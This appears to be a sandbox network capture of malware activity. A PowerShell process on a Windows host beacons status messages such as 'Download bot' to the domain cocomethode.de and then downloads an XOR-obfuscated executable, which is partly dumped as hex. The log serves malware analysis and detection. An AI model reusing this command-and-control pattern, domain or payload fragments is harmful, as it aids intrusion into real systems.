2024-12-11 11:29:14 UTC	1369	IN	Data Raw: 47 59 4e 59 57 4b 50 31 71 44 55 33 79 35 56 46 47 59 4f 56 75 68 4c 33 53 37 56 44 5b 52 63 46 4b 58 50 6c 4f 6b 4c 30 71 70 5b 56 75 6e 65 6c 4c 7b 54 59 57 60 56 46 69 72 52 56 71 7b 55 6a 4f 72 5b 47 57 56 57 6d 5b 52 54 31 57 6a 55 57 53 73 65 33 65 4b 63 54 5b 73 56 6a 4f 42 4c 47 6d 58 55 6f 4b 4b 60 6f 4f 4e 50 33 6d 52 60 47 6a 7b 54 6f 43 68 4c 6b 53 6f 54 47 4f 42 55 30 71 58 58 32 53 57 4c 6a 34 77 56 6d 65 52 4c 56 4b 49 57 6c 75 56 53 31 5b 37 58 55 43 46 60 6c 53 49 63 49 5b 68 60 54 47 31 54 6d 69 6e 63 47 6a 7b 57 6b 43 60 54 31 47 71 54 59 71 76 58 30 58 78 63 49 57 60 53 7b 6a 7b 58 7b 47 35 57 57 71 59 4c 59 65 58 52 44 35 78 56 55 4f 76 52 56 48 7b 55 6b 43 4c 63 57 58 31 56 6d 4f 4b 5b 31 79 57 53 6f 6d 60 4c 30 5b 31 56 6d 62 30 4c Data Ascii: GYNYWKP1qDU3y5VFGYOVuhL3S7VD[RcFKXPlOkL0qp[VunelL{TYW`VFirRVq{UjOr[GWVWm[RT1WjUWSse3eKcT[sVjOBLGmXUoKK`oONP3mR`Gj{ToChLkSoTGOBU0qXX2SWLj4wVmeRLVKIWluVS1[7XUCF`lSIcI[h`TG1TmincGj{WkC`T1GqTYqvX0XxcIW`S{j{X{G5WWqYLYeXRD5xVUOvRVH{UkCLcWX1VmOK[1yWSom`L0[1Vmb0L
2024-12-11 11:29:14 UTC	1369	IN	Data Raw: 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 65 6a 62 33 48 78 52 6c 69 68 53 49 43 49 54 31 57 60 52 57 5b 57 63 44 71 59 53 6c 69 42 52 54 50 76 5b 30 47 45 5b 32 43 51 65 7b 43 4d 53 47 47 76 63 56 53 59 4f 56 71 6a 53 33 79 33 58 6c 6d 42 54 47 4f 56 5b 44 4f 57 57 57 4b 4c 54 7b 47 56 55 31 53 53 62 45 65 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 60 46 79 5b 57 30 4b 72 58 33 34 4f 5b 30 43 55 50 6a 47 6d 4c 7b 40 32 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 32 53 72 5b 57 4f 43 4e 54 6d 45 52 6a 53 68 4c 6b 54 76 56 6d 62 30 4c 44 79 56 54 6b 57 6b 53 30 57 71 55 32 62 76 52 31 6d 45 50 56 65 4b Data Ascii: dyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#Rjejb3HxRlihSICIT1W`RW[WcDqYSliBRTPv[0GE[2CQe{CMSGGvcVSYOVqjS3y3XlmBTGOV[DOWWWKLT{GVU1SSbEeDTV8oRTOC[1qI`Fy[W0KrX34O[0CUPjGmL{@2SGGw[1mEPVeJS2Sr[WOCNTmERjShLkTvVmb0LDyVTkWkS0WqU2bvR1mEPVeK
2024-12-11 11:29:14 UTC	1369	IN	Data Raw: 6d 45 50 56 65 4b 64 54 4b 44 58 6b 48 30 4c 6d 71 58 52 6b 43 4b 53 31 71 33 56 6a 69 73 5b 33 53 49 4e 46 65 6b 4c 30 4b 34 58 57 62 30 63 6a 53 53 63 33 65 4b 50 31 47 6f 52 6a 69 4e 4c 46 4f 75 63 49 57 60 4c 44 71 33 56 6a 69 73 5b 30 43 55 50 6c 4b 6b 4c 30 4b 34 58 57 62 30 63 6d 69 55 5b 33 75 68 53 7b 6d 74 57 47 69 4e 63 6a 6d 48 65 33 65 53 4c 6b 6d 30 5b 46 30 56 64 56 53 46 54 6f 5b 4c 57 59 43 37 58 6b 48 31 62 44 38 32 4c 44 75 4b 50 31 47 6f 52 54 69 6a 64 56 47 58 54 6c 79 4c 57 33 69 33 58 7b 4f 53 5b 31 71 48 55 6b 43 6b 63 56 79 30 56 6b 43 4a 65 6d 71 48 60 7b 65 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 5b 49 4f 68 4c 6a 71 6e 58 6a 53 76 53 30 4f 47 56 6a 6d 56 57 56 79 4a 57 31 5b 6e 50 6a 6d 45 62 7b 6d 4b 50 30 4b 37 5b 44 69 4a 62 Data Ascii: mEPVeKdTKDXkH0LmqXRkCKS1q3Vjis[3SINFekL0K4XWb0cjSSc3eKP1GoRjiNLFOucIW`LDq3Vjis[0CUPlKkL0K4XWb0cmiU[3uhS{mtWGiNcjmHe3eSLkm0[F0VdVSFTo[LWYC7XkH1bD82LDuKP1GoRTijdVGXTlyLW3i3X{OS[1qHUkCkcVy0VkCJemqH`{eDTV8oRTOC[1qI[IOhLjqnXjSvS0OGVjmVWVyJW1[nPjmEb{mKP0K7[DiJb
2024-12-11 11:29:14 UTC	1369	IN	Data Raw: 72 52 54 57 60 62 46 4b 49 57 56 65 4c 57 57 71 33 58 33 30 4e 63 44 6d 48 65 33 65 54 4c 30 58 76 55 47 54 30 4c 56 4b 49 65 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 55 56 65 54 4c 30 58 76 58 31 69 56 4c 44 6d 48 54 6c 38 60 54 31 4b 75 58 57 65 35 63 44 6d 48 50 6c 69 6a 53 33 65 4e 50 33 6d 43 5b 31 6d 45 50 6d 69 56 53 6d 5b 56 57 57 57 6e 52 47 53 47 4f 54 30 4b 50 31 71 46 58 6d 69 42 4c 46 57 55 50 6c 30 69 57 32 69 72 52 54 65 4e 64 57 71 59 53 6b 43 60 57 30 47 6f 56 57 69 53 4f 6a 6d 45 54 6c 30 69 57 32 69 72 57 54 65 46 4c 46 47 45 52 54 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 55 56 65 57 63 57 58 76 5b 47 69 4a 65 54 6d 48 54 6c 38 60 54 31 4b 75 58 57 65 35 63 44 6d 48 50 6c 69 6a 53 33 65 4e 50 33 6d 43 5b 31 6d 45 50 6f 6d 60 56 47 Data Ascii: rRTW`bFKIWVeLWWq3X30NcDmHe3eTL0XvUGT0LVKIe14E[{CMRTOC[1mEUVeTL0XvX1iVLDmHTl8`T1KuXWe5cDmHPlijS3eNP3mC[1mEPmiVSm[VWWWnRGSGOT0KP1qFXmiBLFWUPl0iW2irRTeNdWqYSkC`W0GoVWiSOjmETl0iW2irWTeFLFGERT4E[{CMRTOC[1mEUVeWcWXv[GiJeTmHTl8`T1KuXWe5cDmHPlijS3eNP3mC[1mEPom`VG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49751	104.21.1.51	443	8952	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:14 UTC	285	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 140
2024-12-11 11:29:14 UTC	140	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 41 72 74 68 75 72 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
2024-12-11 11:29:15 UTC	1203	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:15 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xd4K7zbbCULtCmk1S4ao7Fn2uAHHfuvRwJwJOx9Y2hhJj46MkvTZTWPvf%2Bh0KiQBcsNvJoRkMS%2F7Z7Vsxkn6ihxueDKoGp2U2%2B8IusyyWY9hn0Ap0eCCytQ%2BHxY7KwcWgzqQ%2FY2rEIyQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16629&min_rtt=1366&rtt_var=23093&sent=6617&recv=2864&lost=0&retrans=0&sent_bytes=9481113&recv_bytes=27537&delivery_rate=37871447&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0522c3ac9ebd0c-ATL server-timing: cfL4;desc="?proto=TCP&rtt=65&min_rtt=62&rtt_var=23&sent=5&recv=7&lost=0&retrans=0&sent_bytes=13236&recv_bytes=1384&delivery_rate=1007430769&cwnd=93&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=43&rtt_var=17&sent=5&recv=7&lost=0&retrans=0&sent_bytes=13433&recv_bytes=1356&delivery_rate=1259288461&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:15 UTC	431	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 35 35 26 6d 69 6e 5f 72 74 74 3d 33 30 26 72 74 74 5f 76 61 72 3d 31 36 26 73 65 6e 74 3d 39 26 72 65 63 76 3d 31 31 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 31 38 38 33 30 26 72 65 63 76 5f 62 79 74 65 73 3d 31 39 32 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 31 38 32 37 36 36 36 36 36 26 63 77 6e 64 3d 33 36 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=55&min_rtt=30&rtt_var=16&sent=9&recv=11&lost=0&retrans=0&sent_bytes=18830&recv_bytes=1924&delivery_rate=2182766666&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=113

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49754	104.21.1.51	443	8952	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:26 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 69
2024-12-11 11:29:26 UTC	69	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
2024-12-11 11:29:27 UTC	1171	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:27 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvJaNtGeEpImOZNMZTWKZ0zHrQlA7eDEp5nQOqyiweSWs0%2BxC3PjJCZTnj18ACdk4JLticgVGGCMtMk%2FnHVWtFIWxTetzZ5bTD6YLsc6zQnOEK7LB9HKb6l31WPYeOjU4AMtpnLI8mFp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10474&min_rtt=1483&rtt_var=15872&sent=12655&recv=5783&lost=0&retrans=0&sent_bytes=18109595&recv_bytes=63630&delivery_rate=47464913&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05230c8b078bb8-ATL server-timing: cfL4;desc="?proto=TCP&rtt=42&min_rtt=42&rtt_var=21&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=617&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=43&min_rtt=43&rtt_var=21&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=67&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:27 UTC	220	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 38 36 35 26 6d 69 6e 5f 72 74 74 3d 31 31 33 38 35 31 26 72 74 74 5f 76 61 72 3d 32 34 30 32 37 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 36 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 31 33 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 36 33 39 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 31 61 61 30 64 32 63 38 35 61 31 36 33 62 61 26 74 73 3d 38 36 33 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113865&min_rtt=113851&rtt_var=24027&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1013&delivery_rate=33639&cwnd=252&unsent_bytes=0&cid=41aa0d2c85a163ba&ts=863&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49755	104.21.1.51	443	8952	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:27 UTC	333	OUT	GET /file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa2b8fd57cf5f0bd3f24c68ed185d64a9ac7de4983fe5e3122fca7943699695f922096bc194352a7f8167d0f40a86605fb5fcbc94e2f07cb01d75a37ad6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:29:28 UTC	1313	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:27 GMT Content-Type: application/octet-stream Content-Length: 8357376 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wsHdceZP%2FmCiCWIHmgmnrEj9pPJFfE73DsNdPekankcCWvQRKQTrIfkaWxQC67v309Bk6PTuwaDEOtzxSLYM05QnVnBM2S3ypyTJiME0vFDR%2BdpoMVE5kFBRixWNk1mq%2B1CXH6abutFj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=31442&min_rtt=1541&rtt_var=29795&sent=26&recv=28&lost=0&retrans=0&sent_bytes=9264&recv_bytes=10707&delivery_rate=2467605&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0523139fecbd44-ATL server-timing: cfL4;desc="?proto=TCP&rtt=60&min_rtt=45&rtt_var=17&sent=12&recv=14&lost=0&retrans=0&sent_bytes=22888&recv_bytes=3061&delivery_rate=1455177777&cwnd=96&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=51&min_rtt=43&rtt_var=20&sent=9&recv=11&lost=0&retrans=0&sent_bytes=22523&recv_bytes=2387&delivery_rate=1259288461&cwnd=115&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:28 UTC	219	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 39 34 36 26 6d 69 6e 5f 72 74 74 3d 31 31 33 38 38 30 26 72 74 74 5f 76 61 72 3d 32 34 31 33 39 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 35 26 72 65 63 76 5f 62 79 74 65 73 3d 39 37 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 35 33 32 26 63 77 6e 64 3d 32 34 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 38 62 66 34 61 30 31 31 34 36 65 66 33 62 66 26 74 73 3d 36 31 36 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113946&min_rtt=113880&rtt_var=24139&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=971&delivery_rate=33532&cwnd=248&unsent_bytes=0&cid=48bf4a01146ef3bf&ts=616&x=0"
2024-12-11 11:29:28 UTC	1206	IN	Data Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 99 0f 59 66 01 01 01 01 01 01 01 01 f1 01 23 Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDeYf#
2024-12-11 11:29:28 UTC	1369	IN	Data Raw: 8c 0c fd e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 d9 25 01 49 8c 04 ff e4 4f 01 49 8c 0c ee e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 d6 25 01 49 8c 04 f0 e4 4f 01 49 8c 0c e3 e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da d6 25 01 49 8c 04 0d e7 4f 01 49 8c 0c fc e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf d6 25 01 49 8c 04 0e e7 4f 01 49 8c 0c 01 e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 d6 25 01 49 8c 04 03 e7 4f 01 49 8c 0c f2 e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 d6 25 01 49 8c 04 04 e7 4f 01 49 8c 0c f7 e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 66 d6 25 01 49 8c 04 f9 e4 4f 01 49 8c 0c e8 e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b d6 25 01 49 8c 04 52 e7 4f 01 49 8c 0c 45 e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2c d6 25 01 49 8c Data Ascii: OI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tIf%IOIOI8tIK%IROIEOI8tI,%I
2024-12-11 11:29:28 UTC	1369	IN	Data Raw: 49 82 38 01 74 00 c2 49 8a d1 e8 c3 d3 25 01 49 8c 04 7a e9 4f 01 49 8c 0c 6d e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a4 d3 25 01 49 8c 04 a7 e9 4f 01 49 8c 0c 96 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 89 d3 25 01 49 8c 04 c0 e9 4f 01 49 8c 0c b3 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 6a d3 25 01 49 8c 04 bd e9 4f 01 49 8c 0c ac e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4f d3 25 01 49 8c 04 b6 e9 4f 01 49 8c 0c a9 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 30 d3 25 01 49 8c 04 ab e9 4f 01 49 8c 0c 9a e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 15 d3 25 01 49 8c 04 9c e9 4f 01 49 8c 0c 8f e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f6 d0 25 01 49 8c 04 99 e9 4f 01 49 8c 0c 88 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 db d0 25 01 49 8c 04 92 e9 4f 01 49 Data Ascii: I8tI%IzOImOI8tI%IOIOI8tI%IOIOI8tIj%IOIOI8tIO%IOIOI8tI0%IOIOI8tI%IOIOI8tI%IOIOI8tI%IOI
2024-12-11 11:29:28 UTC	1369	IN	Data Raw: db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 cc 25 01 49 8c 04 5e 76 90 01 49 8a 01 49 8c 0c c4 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 cc 25 01 49 8c 04 46 76 90 01 49 8a 01 49 8c 0c ac db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 cc 25 01 49 8c 04 36 76 90 01 49 8a 01 49 8c 0c a4 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 cd 25 01 49 8c 04 1e 76 90 01 49 8a 01 49 8c 0c bc db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 cd 25 01 49 8c 04 1e 76 90 01 49 8a 01 49 8c 0c cc db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 cd 25 01 49 8c 04 06 76 90 01 49 8a 01 49 8c 0c c4 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 cd 25 01 49 8c 04 fe 77 90 01 49 8a 01 49 8c 0c ac db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 cd 25 01 49 8c 04 e6 77 90 01 49 8a 01 49 8c 0c Data Ascii: OI8tIG%I^vIIOI8tI'%IFvIIOI8tI%I6vIIOI8tI%IvIIOI8tI%IvIIOI8tI%IvIIOI8tI%IwIIOI8tIg%IwII
2024-12-11 11:29:28 UTC	1369	IN	Data Raw: 49 8a 01 49 8c 0c 34 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c6 25 01 49 8c 04 ce 75 90 01 49 8a 01 49 8c 0c 1c d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c6 25 01 49 8c 04 be 75 90 01 49 8a 01 49 8c 0c 04 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c6 25 01 49 8c 04 a6 75 90 01 49 8a 01 49 8c 0c ec d9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c6 25 01 49 8c 04 8e 75 90 01 49 8a 01 49 8c 0c e4 d9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c6 25 01 49 8c 04 7e 75 90 01 49 8a 01 49 8c 0c cc d9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c6 25 01 49 8c 04 66 75 90 01 49 8a 01 49 8c 0c b4 d9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c6 25 01 49 8c 04 4e 75 90 01 49 8a 01 49 8c 0c 9c d9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c6 25 01 49 8c 04 3e 75 90 Data Ascii: II4OI8tI%IuIIOI8tI%IuIIOI8tI%IuIIOI8tI%IuIIOI8tIg%I~uIIOI8tIG%IfuIIOI8tI'%INuIIOI8tI%I>u
2024-12-11 11:29:28 UTC	1369	IN	Data Raw: 49 8c 04 ce 70 90 01 49 8a 01 49 8c 0c 14 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c3 25 01 49 8c 04 be 70 90 01 49 8a 01 49 8c 0c fc d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c3 25 01 49 8c 04 b6 70 90 01 49 8a 01 49 8c 0c fc d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c3 25 01 49 8c 04 b6 70 90 01 49 8a 01 49 8c 0c f4 d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c3 25 01 49 8c 04 9e 70 90 01 49 8a 01 49 8c 0c dc d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c3 25 01 49 8c 04 9e 70 90 01 49 8a 01 49 8c 0c dc d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c0 25 01 49 8c 04 9e 70 90 01 49 8a 01 49 8c 0c 9c d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c0 25 01 49 8c 04 86 70 90 01 49 8a 01 49 8c 0c 84 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c0 25 Data Ascii: IpIIOI8tI%IpIIOI8tIg%IpIIOI8tIG%IpIIOI8tI'%IpIIOI8tI%IpIIOI8tI%IpIIOI8tI%IpIIOI8tI%
2024-12-11 11:29:28 UTC	1369	IN	Data Raw: 8a d1 e8 47 bc 25 01 49 8c 04 0e 6e 90 01 49 8a 01 49 8c 0c 2c d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bc 25 01 49 8c 04 fe 6f 90 01 49 8a 01 49 8c 0c 34 d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 bc 25 01 49 8c 04 e6 6f 90 01 49 8a 01 49 8c 0c 1c d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bd 25 01 49 8c 04 ce 6f 90 01 49 8a 01 49 8c 0c 04 d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bd 25 01 49 8c 04 c6 6f 90 01 49 8a 01 49 8c 0c ec d5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bd 25 01 49 8c 04 b6 6f 90 01 49 8a 01 49 8c 0c d4 d5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bd 25 01 49 8c 04 9e 6f 90 01 49 8a 01 49 8c 0c bc d5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bd 25 01 49 8c 04 86 6f 90 01 49 8a 01 49 8c 0c a4 d5 4f 01 49 82 38 01 74 00 c2 Data Ascii: G%InII,OI8tI'%IoII4OI8tI%IoIIOI8tI%IoIIOI8tI%IoIIOI8tI%IoIIOI8tI%IoIIOI8tIg%IoIIOI8t
